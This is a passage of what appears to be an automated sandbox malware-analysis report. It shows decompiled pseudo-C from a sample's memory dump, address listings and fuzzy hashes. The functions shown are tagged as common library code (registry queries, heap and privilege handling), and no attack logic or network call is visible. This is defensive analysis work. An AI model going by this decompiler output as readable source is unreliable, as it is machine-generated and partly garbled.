							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E017A95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01777F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                              0x017903f1
                                                                              0x017903f7
                                                                              0x017903f9
                                                                              0x017903fb
                                                                              0x017903fd
                                                                              0x01790400
                                                                              0x0179040a
                                                                              0x017d4c7a
                                                                              0x01790537
                                                                              0x01790547
                                                                              0x01790410
                                                                              0x01790410
                                                                              0x01790414
                                                                              0x01790417
                                                                              0x0179041a
                                                                              0x01790421
                                                                              0x01790424
                                                                              0x0179042b
                                                                              0x0179043b
                                                                              0x0179043e
                                                                              0x0179043f
                                                                              0x0179043f
                                                                              0x01790446
                                                                              0x01790449
                                                                              0x0179044c
                                                                              0x0179044f
                                                                              0x01790459
                                                                              0x017d4c8d
                                                                              0x0179045f
                                                                              0x0179045f
                                                                              0x0179045f
                                                                              0x01790467
                                                                              0x017d4c97
                                                                              0x017d4c9d
                                                                              0x017d4ca4
                                                                              0x017d4caa
                                                                              0x017d4caf
                                                                              0x017d4cb1
                                                                              0x017d4cc3
                                                                              0x017d4cb3
                                                                              0x017d4cbc
                                                                              0x017d4cbc
                                                                              0x017d4cc8
                                                                              0x017d4ccb
                                                                              0x017d4cd7
                                                                              0x017d4cda
                                                                              0x017d4cdf
                                                                              0x017d4cdf
                                                                              0x017d4ccb
                                                                              0x017d4ca4
                                                                              0x0179046d
                                                                              0x0179046f
                                                                              0x0179046f
                                                                              0x01790471
                                                                              0x01790476
                                                                              0x0179047a
                                                                              0x0179047b
                                                                              0x01790483
                                                                              0x01790489
                                                                              0x0179048d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4ce9
                                                                              0x017d4cef
                                                                              0x017d4d22
                                                                              0x017d4d22
                                                                              0x00000000
                                                                              0x017d4d22
                                                                              0x017d4cf1
                                                                              0x017d4cf7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4cf9
                                                                              0x017d4cff
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4d05
                                                                              0x017d4d07
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4d0d
                                                                              0x017d4d0f
                                                                              0x017d4d14
                                                                              0x017d4d16
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4d1c
                                                                              0x017d4d1c
                                                                              0x01790499
                                                                              0x01790535
                                                                              0x01790535
                                                                              0x00000000
                                                                              0x01790535
                                                                              0x017904a6
                                                                              0x017d4d2c
                                                                              0x017d4d37
                                                                              0x017d4d39
                                                                              0x017d4d3b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4d41
                                                                              0x017d4d48
                                                                              0x01790527
                                                                              0x0179052b
                                                                              0x0179052d
                                                                              0x01790530
                                                                              0x01790530
                                                                              0x00000000
                                                                              0x0179052b
                                                                              0x017d4d4e
                                                                              0x017904ac
                                                                              0x017904ac
                                                                              0x017904af
                                                                              0x017904b2
                                                                              0x017904b7
                                                                              0x017904b9
                                                                              0x017904bb
                                                                              0x017904bd
                                                                              0x017904bf
                                                                              0x017904c5
                                                                              0x017904c9
                                                                              0x017d4d53
                                                                              0x017d4d59
                                                                              0x017d4db9
                                                                              0x017d4dba
                                                                              0x017d4dbf
                                                                              0x017d4dc2
                                                                              0x017d4dc4
                                                                              0x017d4dc7
                                                                              0x017d4dce
                                                                              0x00000000
                                                                              0x017d4dce
                                                                              0x017d4d5b
                                                                              0x017d4d61
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4d63
                                                                              0x017d4d69
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4d6b
                                                                              0x017d4d6e
                                                                              0x017d4d74
                                                                              0x017d4d76
                                                                              0x017d4d7c
                                                                              0x017d4d7e
                                                                              0x017d4d84
                                                                              0x017d4d89
                                                                              0x017d4d8c
                                                                              0x017d4d8d
                                                                              0x017d4d92
                                                                              0x017d4d95
                                                                              0x017d4d96
                                                                              0x017d4d98
                                                                              0x017d4d9a
                                                                              0x017d4d9f
                                                                              0x017d4da4
                                                                              0x017d4da6
                                                                              0x017d4da8
                                                                              0x017d4daf
                                                                              0x017d4db1
                                                                              0x017d4db1
                                                                              0x017d4daf
                                                                              0x017d4da6
                                                                              0x017d4d84
                                                                              0x017d4d7c
                                                                              0x00000000
                                                                              0x017d4d74
                                                                              0x017904d6
                                                                              0x017d4de1
                                                                              0x017904dc
                                                                              0x017904dc
                                                                              0x017904dc
                                                                              0x017904e4
                                                                              0x017d4deb
                                                                              0x017d4df1
                                                                              0x017d4df8
                                                                              0x017d4dfe
                                                                              0x017d4e03
                                                                              0x017d4e05
                                                                              0x017d4e17
                                                                              0x017d4e07
                                                                              0x017d4e10
                                                                              0x017d4e10
                                                                              0x017d4e1c
                                                                              0x017d4e1f
                                                                              0x017d4e35
                                                                              0x017d4e35
                                                                              0x017d4e1f
                                                                              0x017d4df8
                                                                              0x017904f1
                                                                              0x017904fa
                                                                              0x017d4e3f
                                                                              0x017d4e47
                                                                              0x017d4e5b
                                                                              0x017d4e61
                                                                              0x017d4e67
                                                                              0x017d4e69
                                                                              0x017d4e71
                                                                              0x017d4e73
                                                                              0x01790500
                                                                              0x01790500
                                                                              0x01790500
                                                                              0x017904fa
                                                                              0x01790508
                                                                              0x0179051d
                                                                              0x0179051d
                                                                              0x0179051f
                                                                              0x01790524
                                                                              0x00000000
                                                                              0x01790524
                                                                              0x01790515
                                                                              0x01790517
                                                                              0x017d4e7a
                                                                              0x017d4e7c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d4e85
                                                                              0x00000000
                                                                              0x017d4e85
                                                                              0x00000000
                                                                              0x01790517

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 28899e04c1cbfe1b680d7f773cae39d81116e9337c1213910f51b14a5f38c92d
                                                                              • Instruction ID: 73c1bb4a368f3a431a1750a34c5ed481a83da5c4c1ee806c0917687b0fa28b14
                                                                              • Opcode Fuzzy Hash: 28899e04c1cbfe1b680d7f773cae39d81116e9337c1213910f51b14a5f38c92d
                                                                              • Instruction Fuzzy Hash: C0912731E00219AFEF319A6CD848BADFBF8EB05714F1502A1FA12A76E1D7749D44CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176C600 Relevance: .2, Instructions: 225COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 67%
                                                                              			E0176C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x185d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01776D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E017AB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1857b9c; // 0x0
					_t74 = L01784620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E017A9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L017877F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E017AF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E017A13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L017877F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E017A9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                              0x0176c608
                                                                              0x0176c615
                                                                              0x0176c625
                                                                              0x0176c62d
                                                                              0x0176c635
                                                                              0x0176c640
                                                                              0x0176c680
                                                                              0x0176c687
                                                                              0x0176c688
                                                                              0x0176c689
                                                                              0x0176c694
                                                                              0x0176c694
                                                                              0x0176c642
                                                                              0x0176c64a
                                                                              0x0176c697
                                                                              0x017d7a25
                                                                              0x017d7a2b
                                                                              0x017d7a2e
                                                                              0x017d7a30
                                                                              0x017d7bea
                                                                              0x017d7bea
                                                                              0x00000000
                                                                              0x017d7bea
                                                                              0x017d7a36
                                                                              0x017d7a43
                                                                              0x017d7a48
                                                                              0x017d7a4c
                                                                              0x017d7a4e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7a58
                                                                              0x017d7a5a
                                                                              0x017d7a5b
                                                                              0x017d7a5c
                                                                              0x017d7a5d
                                                                              0x017d7a63
                                                                              0x017d7a64
                                                                              0x017d7a6a
                                                                              0x017d7a6c
                                                                              0x017d7a6e
                                                                              0x017d79cb
                                                                              0x017d79cb
                                                                              0x017d79ce
                                                                              0x017d79d0
                                                                              0x017d7a98
                                                                              0x017d7a9b
                                                                              0x017d7a9b
                                                                              0x017d7a9e
                                                                              0x017d7aa1
                                                                              0x017d7bbe
                                                                              0x017d7bbe
                                                                              0x017d7bc0
                                                                              0x017d7be0
                                                                              0x017d7be0
                                                                              0x017d7a01
                                                                              0x017d7a01
                                                                              0x017d7a05
                                                                              0x017d7a07
                                                                              0x017d7a15
                                                                              0x017d7a15
                                                                              0x017d7a1a
                                                                              0x00000000
                                                                              0x017d7a1a
                                                                              0x017d7bc2
                                                                              0x017d7bc6
                                                                              0x017d7bc9
                                                                              0x017d7bcd
                                                                              0x017d7bcf
                                                                              0x017d79e6
                                                                              0x017d79e6
                                                                              0x017d79eb
                                                                              0x017d79eb
                                                                              0x017d79ef
                                                                              0x017d79f1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d79f3
                                                                              0x017d79f5
                                                                              0x017d79ff
                                                                              0x017d79ff
                                                                              0x00000000
                                                                              0x017d79ff
                                                                              0x017d79f7
                                                                              0x017d79fd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d79fd
                                                                              0x017d7bd5
                                                                              0x017d7bd8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7ba9
                                                                              0x017d7bac
                                                                              0x017d7bb0
                                                                              0x017d7bb1
                                                                              0x017d7bb1
                                                                              0x017d7bb6
                                                                              0x00000000
                                                                              0x017d7bb6
                                                                              0x017d7aa7
                                                                              0x017d7aaa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7ab2
                                                                              0x017d7ab3
                                                                              0x017d7ab5
                                                                              0x017d7aec
                                                                              0x017d7aef
                                                                              0x017d7b25
                                                                              0x017d7b28
                                                                              0x017d7b62
                                                                              0x017d7b64
                                                                              0x017d7b8f
                                                                              0x017d7b92
                                                                              0x017d7b96
                                                                              0x017d7b98
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7b9e
                                                                              0x017d7b9f
                                                                              0x017d7ba3
                                                                              0x00000000
                                                                              0x017d7ba3
                                                                              0x017d7b66
                                                                              0x017d7b68
                                                                              0x017d7ae2
                                                                              0x017d7ae2
                                                                              0x00000000
                                                                              0x017d7ae2
                                                                              0x017d7b6e
                                                                              0x017d7b72
                                                                              0x017d7b75
                                                                              0x017d7b81
                                                                              0x017d7b85
                                                                              0x017d7b87
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7b31
                                                                              0x017d7b34
                                                                              0x017d7b3c
                                                                              0x017d7b45
                                                                              0x017d7b46
                                                                              0x017d7b4f
                                                                              0x017d7b51
                                                                              0x017d7b57
                                                                              0x017d7b59
                                                                              0x017d7b59
                                                                              0x00000000
                                                                              0x017d7b59
                                                                              0x017d7b77
                                                                              0x00000000
                                                                              0x017d7b77
                                                                              0x017d7b2a
                                                                              0x00000000
                                                                              0x017d7b2a
                                                                              0x017d7af1
                                                                              0x017d7af3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7afb
                                                                              0x017d7afc
                                                                              0x017d7afe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7b00
                                                                              0x017d7b03
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7b05
                                                                              0x017d7b09
                                                                              0x017d7b0d
                                                                              0x017d7b0f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7b18
                                                                              0x017d7b1d
                                                                              0x00000000
                                                                              0x017d7b1d
                                                                              0x017d7ab7
                                                                              0x017d7ab9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7abf
                                                                              0x017d7ac1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7ac3
                                                                              0x017d7ac6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7ac8
                                                                              0x017d7acc
                                                                              0x017d7ad0
                                                                              0x017d7ad2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7adb
                                                                              0x00000000
                                                                              0x017d7adb
                                                                              0x017d79d6
                                                                              0x017d79d9
                                                                              0x017d79dc
                                                                              0x017d7a91
                                                                              0x017d7a94
                                                                              0x00000000
                                                                              0x017d7a94
                                                                              0x017d79e2
                                                                              0x00000000
                                                                              0x017d79e2
                                                                              0x017d7a74
                                                                              0x017d7a7a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d7a8a
                                                                              0x017d7a21
                                                                              0x017d7a21
                                                                              0x00000000
                                                                              0x017d7a21
                                                                              0x0176c650
                                                                              0x0176c651
                                                                              0x0176c656
                                                                              0x0176c65c
                                                                              0x0176c65d
                                                                              0x0176c663
                                                                              0x0176c664
                                                                              0x0176c66a
                                                                              0x0176c66e
                                                                              0x017d79c5
                                                                              0x017d79c7
                                                                              0x00000000
                                                                              0x017d79c7
                                                                              0x0176c67a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 658fb9af993525ce8f5a22ead7df6c35c0e90bc0e117080de620509317a7f704
                                                                              • Instruction ID: 5a82f75dcb4d151e93c05e93a86d8b1c3c71489cfff6ca9b7c1d8f631ed47260
                                                                              • Opcode Fuzzy Hash: 658fb9af993525ce8f5a22ead7df6c35c0e90bc0e117080de620509317a7f704
                                                                              • Instruction Fuzzy Hash: 2C81A47664420A9BDB2ACF58C880A7BF7F4FB84358F14495EEE459B245D330DE40CBA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017FB8D0 Relevance: .2, Instructions: 199COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 39%
                                                                              			E017FB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1857b9c; // 0x0
				_t124 = L01784620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E017A9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E017A95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E017A95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L017877F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E017A9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E017A95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1857b9c; // 0x0
									_t92 = L01784620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E017A9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0176A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E017FE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E017FE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E017A95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                              0x017fb8d9
                                                                              0x017fb8e4
                                                                              0x00000000
                                                                              0x017fb8e6
                                                                              0x017fb8f3
                                                                              0x017fb8f5
                                                                              0x017fb8f5
                                                                              0x017fb8f8
                                                                              0x017fb920
                                                                              0x017fb924
                                                                              0x017fb936
                                                                              0x017fb939
                                                                              0x017fb93d
                                                                              0x017fb948
                                                                              0x017fb9a0
                                                                              0x017fb9a0
                                                                              0x017fb9a4
                                                                              0x017fb9bf
                                                                              0x017fb9c4
                                                                              0x017fb9c6
                                                                              0x017fb9cd
                                                                              0x017fb9d1
                                                                              0x017fbad4
                                                                              0x017fbad8
                                                                              0x017fbada
                                                                              0x017fbadc
                                                                              0x017fbadc
                                                                              0x017fbadf
                                                                              0x017fbae0
                                                                              0x017fbae2
                                                                              0x017fbae4
                                                                              0x017fbaec
                                                                              0x017fbaee
                                                                              0x017fbaf0
                                                                              0x017fbaf0
                                                                              0x017fbaec
                                                                              0x017fbafb
                                                                              0x017fbafc
                                                                              0x017fbafe
                                                                              0x017fbb01
                                                                              0x017fbb01
                                                                              0x00000000
                                                                              0x017fbb06
                                                                              0x017fb9d7
                                                                              0x017fb9db
                                                                              0x017fb9db
                                                                              0x017fb9de
                                                                              0x017fb9de
                                                                              0x017fb9e4
                                                                              0x017fb9e7
                                                                              0x017fb9ea
                                                                              0x017fb9ec
                                                                              0x017fb9ef
                                                                              0x017fb9f3
                                                                              0x017fba1b
                                                                              0x017fba1b
                                                                              0x017fba23
                                                                              0x017fba24
                                                                              0x017fba27
                                                                              0x017fba2a
                                                                              0x017fba2b
                                                                              0x017fba2e
                                                                              0x017fba30
                                                                              0x017fba37
                                                                              0x017fba3f
                                                                              0x017fba9c
                                                                              0x017fbaa2
                                                                              0x017fbb13
                                                                              0x017fbb15
                                                                              0x017fbaae
                                                                              0x017fbaae
                                                                              0x017fbab3
                                                                              0x017fbab5
                                                                              0x017fbaba
                                                                              0x017fbac8
                                                                              0x017fbac8
                                                                              0x017fbaba
                                                                              0x017fbacd
                                                                              0x017fbacf
                                                                              0x00000000
                                                                              0x017fbacf
                                                                              0x017fbb1a
                                                                              0x00000000
                                                                              0x017fbb1c
                                                                              0x017fbaa7
                                                                              0x017fbb11
                                                                              0x00000000
                                                                              0x017fbb11
                                                                              0x017fbaa9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fba41
                                                                              0x017fba41
                                                                              0x017fba41
                                                                              0x017fba58
                                                                              0x017fba5d
                                                                              0x017fba62
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fba64
                                                                              0x017fba67
                                                                              0x017fba68
                                                                              0x017fba69
                                                                              0x017fba6c
                                                                              0x017fba6f
                                                                              0x017fba71
                                                                              0x017fba78
                                                                              0x017fba80
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fba90
                                                                              0x017fba90
                                                                              0x017fba97
                                                                              0x00000000
                                                                              0x017fba97
                                                                              0x017fb9f5
                                                                              0x017fb9f7
                                                                              0x017fb9f7
                                                                              0x017fb9fa
                                                                              0x017fba03
                                                                              0x017fba07
                                                                              0x017fba0c
                                                                              0x017fba10
                                                                              0x017fba17
                                                                              0x00000000
                                                                              0x017fb9f7
                                                                              0x017fb9a6
                                                                              0x017fb9a8
                                                                              0x017fb9af
                                                                              0x017fb9b3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fb9b9
                                                                              0x00000000
                                                                              0x017fb9b9
                                                                              0x017fb94d
                                                                              0x017fb98f
                                                                              0x017fb995
                                                                              0x017fb999
                                                                              0x017fb960
                                                                              0x017fb967
                                                                              0x017fb968
                                                                              0x017fb96a
                                                                              0x00000000
                                                                              0x017fb96a
                                                                              0x017fb99b
                                                                              0x017fb99e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fb99e
                                                                              0x017fb951
                                                                              0x017fb954
                                                                              0x017fb95a
                                                                              0x017fb95e
                                                                              0x017fb972
                                                                              0x017fb979
                                                                              0x017fb97d
                                                                              0x017fb97f
                                                                              0x017fb980
                                                                              0x017fb982
                                                                              0x017fb984
                                                                              0x00000000
                                                                              0x017fb984
                                                                              0x00000000
                                                                              0x017fb926
                                                                              0x00000000
                                                                              0x017fb926

                                                                              Memory Dump Source
